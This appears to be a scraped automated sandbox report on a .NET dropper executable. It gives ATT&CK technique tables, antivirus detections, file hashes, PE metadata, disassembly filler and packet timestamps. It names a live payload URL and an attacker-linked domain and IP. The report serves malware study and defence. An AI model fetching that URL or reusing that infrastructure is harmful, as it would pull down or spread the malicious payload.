                Source: C:\Users\user\Desktop\TiOWA908TP.exeQueries volume information: C:\Users\user\Desktop\TiOWA908TP.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                211
                Process Injection
                1
                Disable or Modify Tools
                OS Credential Dumping111
                Security Software Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                51
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Process Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                Process Injection
                Security Account Manager51
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture13
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets12
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                TiOWA908TP.exe100%AviraTR/Dropper.Gen
                TiOWA908TP.exe19%VirustotalBrowse
                TiOWA908TP.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://beta.visualstudio.net/net/sdk/feedback.asp0%Avira URL Cloudsafe
                https://cud-senegal.org/post-postlogin/Gjflop.mp30%Avira URL Cloudsafe
                https://cud-senegal.org0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                cud-senegal.org
                51.159.14.89
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://cud-senegal.org/post-postlogin/Gjflop.mp3false
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://beta.visualstudio.net/net/sdk/feedback.aspTiOWA908TP.exe, 00000000.00000002.4838355628.0000000070A01000.00000020.00000001.01000000.00000008.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/mgravell/protobuf-netTiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpfalse
                    high
                    http://www.quovadis.bm0TiOWA908TP.exe, 00000000.00000002.4833119987.0000000005FE0000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://github.com/mgravell/protobuf-netiTiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpfalse
                        high
                        https://stackoverflow.com/q/14436606/23354TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.4815695727.000000000276D000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://github.com/mgravell/protobuf-netJTiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpfalse
                            high
                            https://ocsp.quovadisoffshore.com0TiOWA908TP.exe, 00000000.00000002.4833119987.0000000005FE0000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTiOWA908TP.exe, 00000000.00000002.4815695727.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://cud-senegal.orgTiOWA908TP.exe, 00000000.00000002.4815695727.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://stackoverflow.com/q/11564914/23354;TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/2152978/23354TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    51.159.14.89
                                    cud-senegal.orgFrance
                                    12876OnlineSASFRfalse
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1590837
                                    Start date and time:2025-01-14 15:16:17 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 32s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Potential for more IOCs and behavior
                                    Number of analysed new started processes analysed:5
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:TiOWA908TP.exe
                                    Detection:MAL
                                    Classification:mal88.evad.winEXE@4/0@1/1
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 93%
                                    • Number of executed functions: 381
                                    • Number of non-executed functions: 44
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): WerFault.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                    • Execution Graph export aborted for target InstallUtil.exe, PID 7596 because it is empty
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    TimeTypeDescription
                                    09:18:22API Interceptor19x Sleep call for process: TiOWA908TP.exe modified
                                    No context
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    OnlineSASFRhttp://aeromorning.comGet hashmaliciousUnknownBrowse
                                    • 212.129.3.113
                                    12E56QE1Fc.exeGet hashmaliciousAzorultBrowse
                                    • 51.15.142.235
                                    4.elfGet hashmaliciousUnknownBrowse
                                    • 51.158.21.37
                                    miori.sh4.elfGet hashmaliciousUnknownBrowse
                                    • 212.129.5.22
                                    https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253DGet hashmaliciousUnknownBrowse
                                    • 163.172.240.109
                                    Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                    • 212.129.3.113
                                    Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                    • 212.129.3.112
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0ehttps://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
                                    • 51.159.14.89
                                    50201668.exeGet hashmaliciousMassLogger RATBrowse
                                    • 51.159.14.89
                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 51.159.14.89
                                    VRO.exeGet hashmaliciousUnknownBrowse
                                    • 51.159.14.89
                                    mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                    • 51.159.14.89
                                    VRO.exeGet hashmaliciousUnknownBrowse
                                    • 51.159.14.89
                                    mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                    • 51.159.14.89
                                    No context
                                    No created / dropped files found
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):0.014109040332189342
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:TiOWA908TP.exe
                                    File size:104'857'600 bytes
                                    MD5:f1bbcbcf580673f86692045f0e6c1141
                                    SHA1:14b1bb7f931dad06ca86e7d1921a3dd09153fa49
                                    SHA256:019e924a0b82a0c448cb283cb72b47ad019ecc4de05fddbd41c983f704271c03
                                    SHA512:29e89a172b5ec38ccef22af821ef5b92d049d4dfb59751a77f6a6f1843343f199b3372e3a59bb795699c219c10721bcdd1671284657de11332c62cc0febb8fe9
                                    SSDEEP:1536:EA3d8vNhDwPJrB5I+IYcUUvs1R82opTiKZ6VQI:EAt8vNwrDI+sUK226/
                                    TLSH:4A381A81F35403B1F9AA0B3CA8A78A124B3A7DBB8D45FB4D184D72510F77792852375A
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.g................................. ........@.. ....................................`................................
                                    Icon Hash:3819386387c91919
                                    Entrypoint:0x40a59e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x67864A11 [Tue Jan 14 11:27:13 2025 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa5540x4a.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x11ad2.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1e0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x85a40x8600b83b373dcedc444eaba999355bc881e1False0.48347131529850745data5.635715646525423IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0xc0000x11ad20x11c007e5c1e0a79afa2908d4b3c0e881f4bf7False0.21762213908450703data2.6460935023941827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1e0000xc0x2008c6ae808a6b411a0a0bf99753758292bFalse0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0xc06c0x114b8Device independent bitmap graphic, 114 x 300 x 32, image size 68400, resolution 3779 x 3779 px/m0.21019198193111235
                                    RT_GROUP_ICON0x1d5600x14data1.15
                                    RT_VERSION0x1d5b00x2fcdata0.43848167539267013
                                    RT_MANIFEST0x1d8e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                    DLLImport
                                    mscoree.dll_CorExeMain
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 14, 2025 15:18:23.524852037 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:23.524895906 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:23.525237083 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:23.537831068 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:23.537864923 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:23.920802116 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:23.921047926 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:23.924657106 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:23.924726009 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:23.925527096 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:23.958544970 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.002211094 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.425724030 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.425770044 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.425856113 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.425865889 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.425966978 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.425992012 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.426011086 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.426099062 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.426342964 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.427206039 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.427237034 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.427346945 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.427434921 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.427444935 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.427509069 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.471668005 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.602300882 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.602324009 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.602674961 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.602737904 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.602744102 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.602960110 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.603753090 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.603768110 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.603914022 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.603956938 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.604054928 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.604067087 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.604351044 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.643002987 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.643023014 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.643398046 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.643412113 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.643668890 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.778403997 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.778424978 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.778583050 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.778672934 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.778686047 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.778829098 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.779817104 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.779830933 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.779958010 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.779958010 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.780086994 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.780093908 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.780301094 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.781259060 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.781274080 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.781469107 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.781477928 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.781562090 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.781811953 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.782799959 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.782810926 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.783023119 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.783023119 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.783036947 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.783106089 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.783195019 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.784288883 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.784301043 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.784468889 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.784552097 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.784559011 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.784612894 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.784754038 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.819775105 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.819849014 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.819971085 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.820055008 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.820080042 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.820295095 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.821089983 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.821155071 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.821371078 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.821424007 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.821460962 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.821611881 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.955972910 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.956044912 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.956157923 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.956201077 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.956223011 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.956296921 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.956438065 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.957170963 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.957237959 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.957387924 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.957421064 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.957463026 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.957736969 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.958803892 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.958867073 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.959012985 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.959093094 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.959120989 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.959394932 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.960184097 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.960238934 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.960374117 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.960374117 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.960402012 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.960416079 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.960453987 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.960517883 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.960665941 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.961788893 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.961854935 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.961937904 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.962001085 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.962019920 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.962172031 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.962228060 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.963331938 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.963397980 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.963500977 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.963500977 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.963593960 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.963614941 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.963651896 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.963809967 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.964785099 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.964848995 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:24.965078115 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:24.965100050 CET4434972651.159.14.89192.168.11.20
